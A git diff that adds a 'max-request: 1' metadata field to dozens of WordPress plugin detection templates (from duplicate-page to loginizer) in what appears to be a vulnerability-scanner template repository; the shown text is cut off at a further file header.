--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index ba558305a4..6b0ed799ef 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
